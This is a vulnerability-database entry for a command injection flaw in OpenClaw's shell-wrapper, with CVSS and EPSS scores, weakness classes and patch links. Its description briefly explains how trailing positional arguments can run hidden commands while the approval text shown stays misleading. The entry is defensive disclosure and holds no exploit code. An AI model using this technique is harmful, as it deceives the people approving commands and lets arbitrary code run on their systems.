CVE-2026-32052

MEDIUM EPSS 55.5%
Published Mar 21, 20263mo ago · Modified Jun 17, 20261w ago
5.8 CVSS 4.0
Medium
Find Similar
Published Mar 21, 2026 3mo ago
Last Modified Jun 17, 2026 1w ago

Description

OpenClaw versions prior to 2026.2.24 contain a command injection vulnerability in the system.run shell-wrapper that allows attackers to execute hidden commands by injecting positional argv carriers after inline shell payloads. Attackers can craft misleading approval text while executing arbitrary commands through trailing positional arguments that bypass display context validation.

CVSS Details

Base Score
5.8
Exploitability
Impact
Vector string
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector Network
Attack Complexity High
Privileges Required Low
User Interaction A
Scope X

Threat Intelligence

EPSS Exploit Probability
55.5% percentile
Exploit & Patch Status
No Known Exploit
Patch Available

Weaknesses 2

CWE-436
CWE-77 Command Injection Injection

Affected Products 1

VendorProductVersionRange
openclawopenclaw* <2026.2.24

References 4

  • github.com https://github.com/openclaw/openclaw/commit/0f0a680d3df81739ea5088a2f88e65f938b7936b
    Patch
  • github.com https://github.com/openclaw/openclaw/commit/55cf92578d266987e390c4bf688196af98eac748
    Patch
  • github.com https://github.com/openclaw/openclaw/security/advisories/GHSA-6rcp-vxwf-3mfp
    Vendor Advisory
  • vulncheck.com https://www.vulncheck.com/advisories/openclaw-hidden-command-execution-via-shell-wrapper-positional-argv-carriers
    Third Party Advisory

Remediation

  • github.com https://github.com/openclaw/openclaw/commit/0f0a680d3df81739ea5088a2f88e65f938b7936b
    Patch
  • github.com https://github.com/openclaw/openclaw/commit/55cf92578d266987e390c4bf688196af98eac748
    Patch